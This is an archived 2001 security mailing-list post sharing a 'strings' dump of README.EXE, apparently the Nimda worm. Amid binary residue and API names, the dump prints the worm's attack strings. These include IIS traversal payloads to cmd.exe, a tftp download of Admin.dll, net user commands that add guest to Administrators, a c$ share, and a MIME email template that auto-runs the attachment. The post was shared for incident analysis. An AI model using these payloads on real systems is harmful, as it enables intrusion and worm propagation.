I've done a strings on the README.EXE file and I've attached it AS TEXT for anyone who is interested! __________________________________________________ Terrorist Attacks on U.S. - How can you help? Donate cash, emergency relief information http://dailynews.yahoo.com/fc/US/Emergency_Information/ !This program cannot be run in DOS mode. O<Richq .text `.rdata @.data .rsrc @.reloc SVW3 WPWW r?f 6VWh X_^[ 6SVWj _^[u _^[] }VW GGCC GGCC PSh? SSSh VSSS PSSh@ PSSh@ VWh€ j@PW 69ut X[_^ jcY; 6y.VW 6j@h PQPW Pj@VSW PVSSW 6SSW 6_^3 SUVW 6_^]3 6WPWSh WPWSh WPWSh€ 6VWS 6SShP 6VWS 6SSh0 6VWS 6SSh 6VWS 6SSh 6VWS SPh| 6_^[ ;H(}Rh ;A(}X t0A; \u"€} Vh, 6_^[ SVWhD H;L$ GY;~ 9~ v GY;~ r QSPh 6PSj ;Et X_^[ PVVh X_^] SUVW _^][Y SVWjY X_^[ SVW3 Ph~f VPVV Ph~f jc^W 2u€x X_^[ D$u D$<UP D$@hx D$`QPV D$@P D$@h D$@h D$@h D$@h D$@h D$@h D$@h D$@P D$@P _]Vj t`€e @SVW j@P3 F98t C98u WWW |$$3 D$8WP D$Dj €|$< D$\PWh0 D$\P D$\h( D$`YWPh D$\h€ D$\WP l$4uV D$0j |$0€ 9T$,u<; D$ ; u>9T$ u89T$ u89T$ D$\P F9T$ 29T$ 9T$ t D$(u D$\P L$8j QUPS D$\P t$(j l$,UWjfj D$\P D$\P D$TP D$HP D$TPU D$ph D$TP D$HP D$TPU D$`VP D$\P _^][ YuOV X_^[ SVWht PSh0 YYSj&j ^VSP 6SSSSS X_^[ 6j.V QQSV3 6VVj s h€ X_^[ SUVW t$@V !SSj _^][ 6Wh ( 6YWV 6t\h 6tUh( 6tyh WVVV 6_^[ €8au PVh? VVVh8 PVVh PVh? WPWVh WPWVh 6_^[ X_^[ PSh? SSSh PSSV PWSV PWSV PWSh 6^9] 6_[t D$@P D$@hx D$`QPV D$@P D$@h D$@h Yu:W D$`QPV WSSj t7SV SQWPV <{}%<-~!</t <@ufj E€j@P Ytg€}€@ta E€VP M€QP 6VuD 6YPS €QVP 6j.V Yv'€>Su"€~ th;Y sa Yv:€>Su5€~ Mu/€~ Tu)€~ Pu#€~ ^[WWW 6Wt| SPSS QSUV3 6uQUPP 6ubht X_^][Y 6YSV PVh0 _WVP PVVVVV X_^[ SVW SVh0 YYVSh VVj t_VVh tE95 PSh0 D$ SPh D$ UP D$ SP 6VSh0 6SUj D$ P D$ VP D$$YP 6SUj YPVW X_^][ SUVW 6WUV dWUV D$`QPV X_^][ X_^[ _WVP PVVVVV Yj&P X_^[ ^@[_ 6j?P PPh,o QSPh SVWj VPVV VPVV 6_^3 6u?h€ tWVS NWVS Eu u7WPS u&WVS E_^[] strncpy memset strcpy strlen strtok memcpy strchr strcat rand strcmp _strlwr strncat srand free sprintf malloc atoi strstr strrchr MSVCRT.dll _initterm _adjust_fdiv GetCurrentThreadId CloseHandle WriteFile SetFilePointer CreateFileA MoveFileExA ReadFile SetFileAttributesA FindClose FindNextFileA FindFirstFileA WriteProcessMemory OpenProcess GetCurrentProcessId lstrcmpiA HeapCompact Sleep GetTickCount SetThreadPriority GetCurrentThread CreateMutexA lstrcpyA GetComputerNameA LocalFree lstrlenA LocalAlloc CreateThread ReleaseMutex WaitForSingleObject GetDriveTypeA GetLogicalDrives GetFileSize CopyFileA GetFileAttributesA SetFileTime GetFileTime EndUpdateResourceA UpdateResourceA SizeofResource LockResource LoadResource FindResourceA FreeLibrary BeginUpdateResourceA LoadLibraryExA DeleteFileA GetTempFileNameA CreateProcessA GetModuleFileNameA GetCurrentDirectoryA GetCommandLineA GetTempPathA GetSystemDirectoryA GetWindowsDirectoryA GetModuleHandleA GetVersionExA GetProcAddress LoadLibraryA GetSystemTime ExitProcess HeapDestroy GetLastError HeapCreate WritePrivateProfileStringA KERNEL32.dll RegCloseKey RegQueryValueExA RegOpenKeyExA RegEnumKeyExA RegCreateKeyExA RegDeleteKeyA RegEnumValueA RegSetValueExA RegQueryValueA ADVAPI32.dll System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> --====_ABC1234567890DEF_==== NUL= [rename] \wininit.ini Personal Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders \*.* €EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced \\%s %ld %ld %ld %ld %ld Image Space Exec Write Copy Image Space Exec Read/Write Image Space Exec Read Only Image Space Executable Image Space Write Copy Image Space Read/Write Image Space Read Only Image Space No Access Mapped Space Exec Write Copy Mapped Space Exec Read/Write Mapped Space Exec Read Only Mapped Space Executable Mapped Space Write Copy Mapped Space Read/Write Mapped Space Read Only Mapped Space No Access Reserved Space Exec Write Copy Reserved Space Exec Read/Write Reserved Space Exec Read Only Reserved Space Executable Reserved Space Write Copy Reserved Space Read/Write Reserved Space Read Only Reserved Space No Access Process Address Space Exec Write Copy Exec Read/Write Exec Read Only Executable Write Copy Read/Write Read Only No Access Image User PC Thread Details ID Thread Priority Current Context Switches/sec Start Address Thread Page Faults/sec Virtual Bytes Peak Virtual Bytes Private Bytes ID Process Elapsed Time Priority Base Working Set Peak Working Set % User Time % Privileged Time % Processor Time Process Counter 009 software\microsoft\windows nt\currentversion\perflib\009 Counters Version Last Counter software\microsoft\windows nt\currentversion\perflib /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> /Admin.dll GET %s HTTP/1.0 Host: www Connnection: close readme main index default html .asp .htm \readme.eml .exe winzip32.exe riched20.dll .nws .eml .doc .exe dontrunold ioctlsocket gethostbyname gethostname inet_ntoa inet_addr ntohl htonl ntohs htons closesocket select sendto send recvfrom recv bind connect socket __WSAFDIsSet WSACleanup WSAStartup ws2_32.dll MAPILogoff MAPISendMail MAPIFreeBuffer MAPIReadMail MAPIFindNext MAPIResolveName MAPILogon MAPI32.DLL WNetAddConnection2A WNetCancelConnection2A WNetOpenEnumA WNetEnumResourceA WNetCloseEnum MPR.DLL ShellExecuteA SHELL32.DLL RegisterServiceProcess VirtualFreeEx VirtualQueryEx VirtualAllocEx VirtualProtectEx CreateRemoteThread HeapCompact HeapFree HeapAlloc HeapDestroy HeapCreate KERNEL32.DLL SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Type Remark SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$ Parm2enc Parm1enc Flags Path SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan SYSTEM\CurrentControlSet\Services\lanmanserver\Shares Cache Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail QUIT Subject: From: < DATA RCPT TO: < MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe octet wwwwwp pwlo wwww wwwwwwwwwwx wwwwwwx wwwwx wwwx lffffff ffff H|f €ffff CCCCCC CCCCCCCCC NPAD PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX %0C0Q0_0m0 1&1g1 2i2s2 2I3V3d3s3 4i5€5 6Y6~6 7.7H7{7 8>8J8`8e8 9!9@9W9 :!:[:d:o: ;O;U;k; <&=2=8=E=O=^=j= =>">)>.>E>^> ?)?0?5?@?M?T?]?|? 0'0/0C0 1!1*111:1A1J1Y1q1v1}1 1'2K2 3-343S3a3 4.494?4Q4Y4c4o4u4|4 5,515D5I5Z5_5p5u5 6,616D6I6Y6^6o6€6 7&7+7>7C7S7X7h7m7}7 8(8-8@8E8U8Z8j8o8 9*9/9B9G9W9\9l9q9 ;8;A;_;h;v; <T<d< >2>U>~> ?!?(?/?Q?X?q? 0'030?0X0}0 2<2W2t2 203I3k3~3 4+464B4U4{4 45,5>5P5b5q5 5.646H6g6n6}6 7?7Q7V7 8!8-8:8F8L8q8 929D9O9T9Z9m9v9 <5<?<M<`<f<y< =2=O=h= >">,>@>Q>W>i>v> ?&?6?W?u? 0.0;0R0v0 02171=1Q1W1d1o1v1 2+20262A2U2`2 2.3?3V3\3k3 4$494K4a4v4 5.575J5P5u5{5 6F6k6 777}7 8-848A8N8g8w8 9 9(9-9<9D9P9X9d9l9y9 9":3:=:B:K:W:\:d:i:o:v:{: ;#;(;1;?;G;L;U;\;d;i;o;v;{; <#<(<.<5<:<C<N<V<[<a<h<m<s<z< =!='=.=3=9=@=E=K=R=W=]=d=i=o=v={= >.>J>v> ?.?J?\?m? :0E0Z0x0 1)1D1{1 2&272M2d2 4!4*4@4F4O4 5-5B5R5[5o5y5 6&6I6S6e6€6 707b7 8%8:8E8R8 9*979P9p9 :7:=:F:N:X:a:m:u:|: ;;;L;o; <N<Y<k< =N=y= >+>1>Q>^>f>l>w> ?5?>?W?_?p? 141N1W1 1b2{2 3.3^3d3k3 41474B4H4V4^4e4j4p4 5)5>5F5R5Z5i5v5|5 6!6n6 7)757X7m7x7 8;8F8K8R8W8]8c8 9 9F9L9[9d9v9€9 ;(;8;>;m; <!<.<9<@<_<q< =+=1=y= >V>\>r>x> ?#?;?B?M?T?z? 0v0~0 1 1'141K1d1j1~1 1#2B2`2t2 3%373I3t3{3 4 4+484@4N4S4X4]4h4u4 465R5 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:28:53 PDT